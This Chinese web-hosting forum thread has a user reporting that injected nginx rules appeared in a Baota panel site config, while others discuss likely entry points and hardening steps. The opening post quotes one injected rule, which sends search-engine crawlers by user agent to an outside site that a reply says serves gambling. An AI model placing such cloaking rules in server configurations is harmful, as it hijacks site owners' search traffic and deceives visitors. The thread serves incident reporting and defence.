找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
查看: 91|回复: 9

宝塔配置文件被挂马

[复制链接]

129

主题

303

回帖

1033

积分

金牌会员

积分
1033
发表于 2019-3-13 10:23:18 | 显示全部楼层 |阅读模式
#if ($http_user_agent ~* "baidu|sogou|haosouspider|360spider|Baiduspider|Sosospider|Sogou spider|Sogou web spider|bingbot|YisouSpider|sm.cn|so.com"){rewrite ^/(.*)$1 last;proxy_pass http://bbs.sjc5.com;}


这狗日的在里面加了四五条这个 其心可诛啊
回复

使用道具 举报

332

主题

1万

回帖

2万

积分

论坛元老

积分
25534
发表于 2019-3-13 10:24:13 | 显示全部楼层
跳转到菠菜了。
回复

使用道具 举报

179

主题

4030

回帖

8679

积分

论坛元老

积分
8679
发表于 2019-3-13 10:25:31 | 显示全部楼层
如何安装的
回复

使用道具 举报

129

主题

303

回帖

1033

积分

金牌会员

积分
1033
 楼主| 发表于 2019-3-13 10:25:53 | 显示全部楼层
我也不知道是怎么写进去的!
回复

使用道具 举报

41

主题

221

回帖

581

积分

高级会员

积分
581
发表于 2019-3-13 10:29:30 | 显示全部楼层
加在哪里  网站的nginx配置配置里面吗
哪个版本的宝塔 我记得有一个版本有验证码漏洞
回复

使用道具 举报

129

主题

303

回帖

1033

积分

金牌会员

积分
1033
 楼主| 发表于 2019-3-13 10:32:14 | 显示全部楼层

dalaoa 发表于 2019-3-13 10:29

加在哪里  网站的nginx配置配置里面吗
哪个版本的宝塔 我记得有一个版本有验证码漏洞 ...

单站点的配置文件里面
回复

使用道具 举报

163

主题

1222

回帖

2983

积分

金牌会员

积分
2983
发表于 2019-3-13 10:29:00 | 显示全部楼层
修改宝塔的默认的端口啊, 再启用那个加密的后缀  
修改ssh默认端口
一般不会有问题了
回复

使用道具 举报

41

主题

221

回帖

581

积分

高级会员

积分
581
发表于 2019-3-13 10:34:54 | 显示全部楼层

bob1987 发表于 2019-3-13 10:34

的确,之前有个版本是可以无密码即可渗透的,老版本了,6.0以上以及非开心版,估计不会有这个情况 ...

windows 系统容易出问题,LINUNX没有出现过
回复

使用道具 举报

50

主题

549

回帖

1284

积分

金牌会员

积分
1284
发表于 2019-3-13 10:38:44 | 显示全部楼层

dalaoa 发表于 2019-3-13 10:38

修改宝塔的默认的端口啊, 再启用那个加密的后缀  
修改ssh默认端口
一般不会有问题了

数据量非常大 然后当前是 Centos 6 系统 无法安装7 宝塔是正版如何搞进去的我也想知道,楼主研究研究
回复

使用道具 举报

0

主题

1

回帖

4

积分

新手上路

积分
4
发表于 2019-3-13 10:45:37 | 显示全部楼层

dalaoa 发表于 2019-3-13 10:38

修改宝塔的默认的端口啊, 再启用那个加密的后缀  
修改ssh默认端口
一般不会有问题了

5.9有吗
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|手机版|小黑屋|Discuz! X

GMT+8, 2025-4-25 23:11 , Processed in 0.020236 second(s), 7 queries , Gzip On, Redis On.

Powered by Discuz! X3.5

© 2001-2024 Discuz! Team.

快速回复 返回顶部 返回列表